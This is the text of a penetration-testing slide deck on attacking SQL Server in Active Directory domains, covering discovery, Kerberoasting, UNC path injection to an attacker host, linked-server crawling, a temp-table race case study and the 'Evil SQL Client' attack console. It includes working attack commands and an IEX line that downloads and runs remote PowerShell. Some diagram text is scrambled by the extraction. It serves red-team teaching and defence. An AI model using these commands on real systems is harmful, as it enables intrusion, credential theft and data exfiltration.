SQL Server

Hacking Tips for

ACTIVE DIRECTORY
ENVIRONMENTS
Name: Scott Sutherland

Job: Network & Application Pentester @ NetSPI

Twitter: @_nullbind

Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi
SQLC2
Blogs: https://blog.netspi.com/author/scott-sutherland/
Community involvement:
Code: https://github.com/NetSPI/PowerUpSQL • SQL Injection Wiki
https://github.com/NetSPI/ESC • SQL Server Metasploit modules
https://github.com/NetSPI/SQLC2 • PowerShell Empire functions
• DBATools functions
https://sqlwiki.netspi.com/
• DAFT: C# port of PowerUpSQL
• Bloodhound SQL Server edge help language
PRESENTATION OVERVIEW

5 Reasons to target SQL Server

4 Common Entry Points

3 Common Privilege Escalation Techniques

2 Examples of Temporary Table Abuse

1 Evil SQL Client (ESC) console application (msbuild in line task execution)
Why Target SQL Server?
 Why Target SQL Server?

WHY TARGET SQL SERVER?

1 SQL Servers exist in almost every enterprise environment we see.

2 SQL Servers can be blindly discovered quickly in Active Directory environments.

3 SQL Servers have trust relationships with the OS and Active Directory.

4 Exploitable default configurations are incredibly common.

5 Exploitable weak configurations are incredibly common.

Quick Introduction
PowerUpSQL
 Introduction to PowerUpSQL

INTRODUCTION TO POWERUPSQL

PowerShell tool that can be used to inventory, audit, and exploit weak
SQL Server configurations on scale in AD environments.
It also supports a lot of post-exploitation functionality that covers the kill
chain…like Active Directory recon.

Initial Defense Privilege Lateral Data Command

Discovery AD Recon
Access Evasion Escalation Movement Targeting Execution
 Introduction to PowerUpSQL

INTRODUCTION TO POWERUPSQL

WWW.POWERUPSQL.COM
• Setup instructions
• Cheat sheets
• Code templates
• Function documentation
• Links to:
- Blogs
- Presentations
- Videos
How do find SQL Servers
using Active Directory?
 SQL Server Discovery

How do I find SQL Servers in Active Directory environments?

Domain joined SQL Servers register their service accounts in the Service
Principal Name (SPN) property of the user/computer object in Active
Directory.

The SPNs are added to support Kerberos authentication.

Any domain user can query Active Directory for domain computer/user
SPNS.

SQL Servers can be identified by executing LDAP queries for SPNs

containing “MSSQLSvc”.
 SQL Server Discovery

Active Directory PowerShell Cmdlet

Get-ADObject -LDAPFilter “(servicePrincipalName=MSSQL*)“

 SQL Server Discovery

PowerUpSQL Functions

Get-DomainSpn -DomainController 10.0.0.1 -Username Domain\User -Password Password123!

Get-DomainSpn -SpnService MSSQL Just SQL SPNs

Get-SQLInstanceDomain –Verbose
Common Entry Points
 Common Entry Points

COMMON ENTRY POINTS

1 Domain users can log into SQL Server Express instances by default. Yep.

2 Domain users can log into SQL Server instances due to excessive privileges.

3 Default passwords are configured for logins configured by applications.

4 Weak service account passwords that can be guessed online/offline.

 Common Entry Points

EXCESSIVE PRIVILEGES

Explicit login privileges

provided to domain users by
sysadmins or default
application installations.

SQL Server Express

inherently includes domain
users in the public role
when installed on a domain
system.
 Common Entry Points

EXCESSIVE PRIVILEGES

Explicit login privileges

provided to domain users by
sysadmins or default
application installations.

SQL Server Express

inherently includes domain
users in the public role
when installed on a domain
system.
 Common Entry Points

EXCESSIVE PRIVILEGES

Explicit login privileges

provided to domain users by
sysadmins or default
application installations.

SQL Server Express

inherently includes domain
users in the public role
when installed on a domain
system.
 Common Entry Points

PowerUpSQL Functions: Finding Excessive Privileges

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded –Verbose

Get-SQLInstanceDomain | Get-SQLServerInfoThreaded –Verbose

Common Entry Points
 Common Entry Points

Default Application Logins

 Common Entry Points

DEFAULT APPLICATION LOGINS

Lots of commercial applications commonly use SQL Server.

Many of those applications create default logins in SQL Server.

Those logins often have default passwords that don’t get changed.

Many of those applications create application specific SQL Server instance

names.
Those instance names can be quickly identified via LDAP queries for SPNs,
then we can use Get-SQLServerLoginDefaultPw to identify defaults.
 Common Entry Points

DEFAULT APPLICATION LOGINS: Example

These instance names
are too general for
default login targeting

Software specific instance

name can be used for
targeting default logins
Common Entry Points
 Common Entry Points

Weak Passwords
SQL Server Service Accounts
 Common Entry Points

WEAK SERVICE ACCOUNT PASSWORDS

Online password guessing – mind the lockout policy!

Kerberoasting

Big thanks to: Tim Medin, Benjamin Delpy, Will Schroeder

 Common Entry Points

WHAT IS KERBEROASTING?
Kerberoasting is the process of requesting a TGS service ticket for a domain service account (domain account
with a SPN), recovering the ticket from memory, and trying to determine the password of the service account offline by
attempting to decrypt the ticket.

Kerberos ticket-granting service (TGS) service ticket The requesting domain user
Encrypted with NTLM(RC4) password hash of requesting domain user can decrypt as intended.

Encrypted with NTLM (RC4) password hash This is what is brute

of the service account forced offline. We’ll know
we guessed the right
password for the domain
service account when the
Ticket Information
ticket information decrypts
correctly.
 Common Entry Points

KERBEROASTING ATTACK SUMMARY

COLLECTION
Rubeus.exe kerberoast /outfile:C:\Temp\domainhashes.txt
Rubeus.exe kerberoast /user:SQLSVC /outfile:C:\Temp\sqlhash.txt

CRACKING
hashcat -m 13100 -a 0 sqlhash.txt passwordfile.txt

EXECUTE COMMANDS ON SQL SERVER THAT USE SQLSVC

Invoke-SQLOSCmd -Instance server1\instance1 -username domain\sqlsvc -password “Secret!” -Command "Whoami“

https://github.com/GhostPack/Rubeus#kerberoast | https://hashcat.net/hashcat/
Common Privilege
Escalation Methods
 Common Privilege Escalation Methods

COMMON PRIVILEGE ESCALATION METHODS

1 UNC Path Injection + Hash Capture / SMB Relay

2 User Enumeration + Weak Passwords

3 Linked Server + Excessive Privileges

 Common Privilege Escalation Methods

UNC PATH INJECTION

+ Hash Cracking/Relay
 Common Privilege Escalation Methods

UNC PATH INJECTION + PASSWORD HASH COLLECTION

https://github.com/NetSPI/PowerUpSQL/wiki/SQL-Server---UNC-Path-Injection-Cheat-Sheet

By default, the PUBLIC role can leverage 2 stored procs for UNC injection:
xp_dirtree and xp_fileexist

UNC path injection can be used to force the SQL Server service account to
authenticate to the attacker’s system:
xp_dirtree “\\attackerip\file’

Capture or Relay the NetNTLM password hash for the SQL Server service
which often has sysadmin privileges (Inveigh, Responder, etc)

Sysadmins can execute operating system commands via xp_cmdshell

 Common Privilege Escalation Methods

UNC PATH INJECTION + PASSWORD HASH COLLECTION

Below is the high level process for executing the attack on scale in AD:

1. Locate SQL Servers on the domain via LDAP queries for SQL SPNs
2. Attempt to log into each SQL instance as the current domain user
3. Perform UNC path injection and capture SQL Server service account
password hashes
4. Crack password hashes offline
5. Login into SQL Server and execution OS commands

The Get-SQLServiceAccountPwHashes function can come in handy

Thanks Thomas Elling!
 Common Privilege Escalation Methods

UNC PATH INJECTION + PASSWORD HASH COLLECTION

 Common Privilege Escalation Methods

UNC PATH INJECTION + SMB RELAY TIPS

Make sure your target SQL Server doesn’t check for SMB signing

Target shared SQL Server service accounts

• Service accounts are often configured as sysadmin

• Service accounts are often configured as a local administrator
• Compromise one account = Access to all the SQL Servers that use it
 Common Privilege Escalation Methods

LOCATING SHARED SERVICE ACCOUNTS (PowerUpSQL)

Get List of Domain Joined SQL Servers

$SQLServers = Get-SQLInstanceDomain -Verbose

Group Results to Reveal Shared Accounts

$SQLServers | Group-Object domainaccount | Sort-Object count -Descending

List Instances with using Shared Account

$SQLServers | Where-Object domainaccount -Like “SQLSVC”
 Common Privilege Escalation Methods

USER ENUMERATION
+ WEAK PASSWORDS
 Common Privilege Escalation Methods

ENUMERATING SQL LOGINS

It’s common for developers and vendors to create SQL Logins with the
username with weak passwords, but sometimes you don’t know the login
name.

As a least privilege authenticated user you can blindly enumerate all SQL
Server logins by fuzzing numbers provided to the SUSER_NAME() function.
Those logins can be then be used to guess passwords.
Example:
SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
SELECT SUSER_NAME(3)
…
 Common Privilege Escalation Methods

ENUMERATING DOMAIN USERS AND GROUPS

Through a similar process you can blindly enumeration domain users using
the DEFAULT_DOMAIN(), SUSER_SID, and SUSER_SNAME functions.
Get Domain
SELECT DEFAULT_DOMAIN() as mydomain;

Get the RID for a Known Group

SELECT SUSER_SID('DEMO\Domain Admins’)

Fuzz RID to Enumeration Users and Groups

SELECT
SUSER_SNAME(0x0105000000000005150000009CC30DD479441EDEB31027D0F
4010000)
 Common Privilege Escalation Methods

ENUMERATING LOGINS AND PASSWORD GUESSING

Invoke-SQLAuditWeakLoginPw

1. Blindly enumerates all SQL

logins with least privilege SQL
login
2. Attempt user name as
password
3. Custom user/password lists
can be provided

Get-SQLFuzzDomainAccount

1. Blindly enumerate domain users

and group associated with the
SQL Server domain with least
privilege SQL login
Common Privilege Escalation Methods

LDAP QUERIES
via SQL SERVER
 Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

The OLE DB ADSI provide in SQL Server can be used to craft LDAP
queries. A nice blog was written by Thomas Elling on the subject.

Specifically, queries can be created using ad-hoc queries (OPENROWSET)

or linked servers (OPENQUERY) without requiring a custom CLR or
extended stored procedure.

PowerUpSQL functions and TSQL templates can be found at:

https://www.powerupsql.com
More thanks to Thomas Elling!
 Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

Ad-Hoc Query
example using:

OPENROWSET

DOMAIN USERS
 Common Privilege Escalation Methods

LDAP QUERIES VIA SQL SERVER

Linked Server
example using:

OPENQUERY

DOMAIN USERS
Common Privilege Escalation Methods

Linked Servers +
Excessive Privileges
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Linked servers are basically persistent database connections for SQL

Servers. Usually preconfigured with alternative credentials.

Why should I care?

• Move between SQL Servers (lateral movement)
• Impersonate link users without providing credentials (privilege escalation)
• Crawl SQL Server link networks (bypass network security controls)
• We seem misconfigured linked servers in about 50% environments
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Identify linked servers:

SELECT * FROM MASTER..SYSSERVERS

Query linked server:

SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’)

PowerUpSQL and the Metasploit modules can also be handy for crawling
and command execution through linked servers.
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Leveraging MS SQL Database links

Example of attack path from the
internet Key
PURE
Captain Evil

LVA = Low Value Application

EVIL

Internet
HVA = High Value Application
Ports
80 and 443

DMZ
LVA HVA

Ports
1433 and 1434

LRA
LVA HVA

Intranet DB1
ADS
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Leveraging MS SQL Database links

Example of attack path from the
internet Key
PURE
Captain Evil

LVA = Low Value Application

EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection

DMZ
LVA HVA

Ports
1433 and 1434

LRA
LVA HVA

Intranet DB1
ADS
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Leveraging MS SQL Database links

Example of attack path from the
internet Key
PURE
Captain Evil

LVA = Low Value Application

EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection

DMZ
LVA HVA

Ports
1433 and 1434

LRA
LVA HVA

Intranet
Le DB
as Li
t P nk
ri v w i
ile th
ge
s

DB1
ADS
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Leveraging MS SQL Database links

Example of attack path from the
internet Key
PURE
Captain Evil

LVA = Low Value Application

EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection

DMZ
LVA HVA

Ports
1433 and 1434

LRA
LVA HVA

Intranet
Le DB
as Li ith
t P nk kw t
ri v w i Lin oun
ile th D B a cc
ge SA
s

DB1 Execute SQL queries and

ADS local commands on
database servers via
nested linked services
2
 Common Privilege Escalation Methods

LINKED SERVERS + EXCESSIVE PRIVILEGES

Link crawls can result in access to:

• 100s of systems
• 1000s of databases
• Active Directory domains
• Isolated & protected networks
• Partner networks via VPN

Lots of great work done by Antti Rantasaari:

https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
 Common Privilege Escalation Methods

SQL SERVER LINK + EXCESSIVE PRIVILEGES

 CASE STUDY
Abusing Temporary Tables
 Case Study: Abusing Temporary Tables

ABUSING TEMPORARY TABLES

1 Introduction to common approaches

2 Case Study: Vulnerable Agent Job

 Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

Similar to regular tables, but intended for temporary use

Stored in the tempdb default database

Devs often use them for temporary data storage and data processing

Create race conditions that can compromise data confidentially and integrity

Occasionally result in code execution opportunities

 Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

There are primarily three variations of temporary tables in SQL Server:

Temporary Table Type Scope Scope Description

Table Variable Batch Only accessible within the query batch it’s executed in.
 Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

There are primarily three variations of temporary tables in SQL Server:

Temporary Table Type Scope Scope Description

Table Variable Batch Only accessible within the query batch it’s executed in.

Accessible to all query batches within the same active

Local Temporary Table Current Session connection until the connection is terminated or the table is
explicitly dropped.
 Case Study: Abusing Temporary Tables

WHAT ARE TEMPORARY TABLES IN SQL SERVER?

There are primarily three variations of temporary tables in SQL Server:

Temporary Table Type Scope Scope Description

Table Variable Batch Only accessible within the query batch it’s executed in.

Accessible to all query batches within the same active

Local Temporary Table Current Session connection until the connection is terminated or the table is
explicitly dropped.

Accessible (read/write) to all active connections until

All Sessions
Global Temporary Table there are no references to the table or the table is explicitly
dropped.
 Case Study: Abusing Temporary Tables

HOW TEMPORARY TABLES WORK?

Below are some common queries for creating and querying temp tables:
Temporary Table Type Create Query
DECLARE @table_variable TABLE
(Spy_id INT NOT NULL, SpyName SELECT * FROM
Table Variable
text NOT NULL, RealName text @table_variable
NULL);
 Case Study: Abusing Temporary Tables

HOW TEMPORARY TABLES WORK?

Below are some common queries for creating and querying temp tables:
Temporary Table Type Create Query
DECLARE @table_variable TABLE
(Spy_id INT NOT NULL, SpyName SELECT * FROM
Table Variable
text NOT NULL, RealName text @table_variable
NULL);
CREATE TABLE #LocalTempTbl
(Spy_id INT NOT NULL, SpyName
Local Temporary Table SELECT * FROM #LocalTempTbl
text NOT NULL, RealName text
NULL);
 Case Study: Abusing Temporary Tables

HOW TEMPORARY TABLES WORK?

Below are some common queries for creating and querying temp tables:
Temporary Table Type Create Query
DECLARE @table_variable TABLE
(Spy_id INT NOT NULL, SpyName SELECT * FROM
Table Variable
text NOT NULL, RealName text @table_variable
NULL);
CREATE TABLE #LocalTempTbl
(Spy_id INT NOT NULL, SpyName
Local Temporary Table SELECT * FROM #LocalTempTbl
text NOT NULL, RealName text
NULL);

CREATE TABLE ##GlobalTempTbl

(Spy_id INT NOT NULL, SpyName SELECT * FROM
Global Temporary Table
text NOT NULL, RealName text ##GlobalTempTbl
NULL);
 Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Privileged User: Review Source Code

• Agent Jobs
• Stored Procedures
• DDL Triggers
• DML and Logon Triggers

Unprivileged User: Monitor tempdb

• Global temp table names and
columns
• Global temp table content
 Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb
• View Names
• Global temp tables
don’t always exist for
long
• Limited to point in time
 Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• View Names
• Looping offers better
visibility over time
• Throttle to avoid over
utilizing the CPU ☺
 Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• View Content
• Race condition results
in a data confidentiality
issue
 Case Study: Abusing Temporary Tables

HOW CAN I FIND EXPOSED GLOBAL TEMP TABLES?

Query tempdb in Loop

• Update Content
• Race condition results
in a data integrity issue
• This can lead to code
execution under specific
conditions
 CASE STUDY
VULNERABLE AGENT JOB
 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB - SUMMARY

1 SQL Agent Job exists that executes TSQL job hourly

2 TSQL job dynamically creates PowerShell command

3 TSQL job creates global temp table and stores PowerShell command in it

4 TSQL job selects PowerShell command from global temp table

5 TSQL job executes PowerShell via xp_cmdshell

 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTCK - VIEW NAMES

Query tempdb in Loop

• View Names
• We can see temp tables
being generated with
random names
 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTCK - VIEW NAMES

Query tempdb in Loop

• View Names
• We run the query again
and see different temp
tables names with the
same columns
 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTCK - VIEW CONTENT

Query tempdb in Loop

• View Content
• We see a PowerShell
command being stored in
the temp table that creates
the file:
C:\Program Files\Microsoft SQL
Server\MSSQL12.SQLSERVER201
4\MSSQL\Log\intendedoutput.txt
 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTCK - UPDATE CONTENT

Query tempdb in Loop

• Update Content
• We modify the PowerShell
command being stored in
the temp table to write to:

C:\Program Files\Microsoft SQL

Server\MSSQL12.SQLSERVER201
4\MSSQL\Log\finishline.txt
 Case Study: Vulnerable Agent Job

CASE STUDY: VULNERABLE AGENT JOB ATTCK - VERIFY EXECUTION

Verify file write

• Via explorer
• You could also use
xp_filexist ‘C:\Program
Files\Microsoft SQL
Server\MSSQL12.SQLSE
RVER2014\MSSQL\Log\fi
nishline.txt‘
 Case Study: Vulnerable Agent Job

PREVENTION

Don’t run code blocks that have been stored in a global temporary table.

Don’t store sensitive data or code blocks in a global temporary table.

If you need to access data across multiple sessions consider using

memory-optimized tables.
Based on my lab testing, they can provide similar performance benefits
without having to expose data to unprivileged users. For more
information check out this article from Microsoft..

BLOG: https://blog.netspi.com/exploiting-sql-server-global-temporary-table-race-conditions
 Evil SQL Client: Overview

What is the Evil SQL Client?

SQL Server attack console client written in C#

Supports discovery, access, escalation, and data exfil commands

Built for pentest and red team operations

Ships with files to execute via msbuild inline tasks

Ships with files to execute via PowerShell

 Evil SQL Client: Download

Where can I get it?

https://github.com/netspi/esc
 Evil SQL Client: Execution Options

Execution Options: esc.exe

Download release or compile from source

Execute esc.exe
 Evil SQL Client: Execution Options

Execution Options: msbuild.exe

esc.csproj file contains

the esc.exe source code
in an inline task
*Technique by Casey Smith

Download esc.csproj

Run via msbuild

*Fun fact: No file path needed if
only one .csproj file exists in
directory.
 Evil SQL Client: Execution Options

Execution Options: msbuild.exe

esc.xml contains a byte array of

esc.exe that is loaded via
reflection techniques shared by
@BoHops (GhostBuild),
@subTee, and @mattifestation

Download esc.xml

Run via msbuild

 Evil SQL Client: Execution Options

Execution Options: PowerShell – Loading esc.exe Assembly

Load assembly from file or byte array:

[System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe”)
or
[System.Reflection.Assembly]::Load($filebytes)

Shortcut Download PowerShell code to automatically load Evil SQL Client from a string
containing a hardcoded byte array.

IEX(New-Object
System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/e
sc-example.ps1")
 Evil SQL Client: Execution Options

Execution Options: PowerShell – Executing esc.exe Functions

Call desired functions. Below are some examples:

[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()
[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()
[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList
[evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled"
[evilsqlclient.Program+EvilCommands]::CheckAccess()
[evilsqlclient.Program+EvilCommands]::MasterAccessList
[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()
[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()
[evilsqlclient.Program+EvilCommands]::MasterAccessList

PowerShell Execution Note

The interactive console currently doesn’t work through PowerShell, but all other functions do.
Hopefully, I’ll fix the bug, but it’s still very usable. ☺
 Evil SQL Client: Commands

ESC Commands
Note: The “show settings” command will show the current configuration at any given time.

Discovery Access Gather Escalate Exfil

Discover file Check access Single instance query Check loginaspw Set File
Multi instance query Set FilePath
Discover domainspn Check defaultpw Check uncinject
List serverinfo Set icmp
Discover broadcast Show access List databases Run oscmd Set icmpip
List tables
Show discovered Export access List links Set http
List logins Set httpurl
Export discovered List rolemembers
List privs
*All query results are
exfiled via all
enabled methods.

* The data encryption functions are done, but currently they don’t encrypt exfiltrated data at this time.
 Evil SQL Client: Query Options

Query Options: Single Instance

Configure Single Instance Target

Set target MSSQLSRV04\SQLSERVER2014

Set username backdoor_account
Set password backdoor_account
Show settings

Execute query

Select @@version
Go
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Run discover functions & set

Discover domainspn
Discover broadcast
Discover file c:\temp\instancelist.csv
Show settings
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Run discover functions & set

Discover domainspn
Discover broadcast
Discover file c:\temp\instancelist.csv
Show settings

Enable multi-instance targeting

Set targetall enabled

Show settings
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Run discover functions & set

Discover domainspn
Discover broadcast
Discover file c:\temp\instancelist.csv
Show settings

Enable multi-instance targeting

Set targetall enabled

Show settings

Check initial access

Check access
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Run discover functions & set

Discover domainspn
Discover broadcast
Discover file c:\temp\instancelist.csv
Show settings

Enable multi-instance targeting

Set targetall enabled

Show settings

Check initial access

Check access
Show access
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Execute query

Select @@version
Go
 Evil SQL Client: Query Options

Query Options: Multiple Instances

Execute query

Select @@version
Go

Run Commands

List databases
 Evil SQL Client: General Notes

General Notes

If you mess up a command, just run:

clear

CTRL + C kills the application

 Evil SQL Client: Demo

ESC Demo
 TAKE
AWAYS
 Take Aways

TAKE AWAYS

SQL Server instances are easy to find in Active Directory environments.

The default trust relationships between SQL Server on domain systems

and AD can lead to privilege escalation scenarios.

Attacks can originate from the internet or internal vectors

The same techniques used in PowerUpSQL can be adapted to any medium.

Be proactive about finding common issues and enabled detections.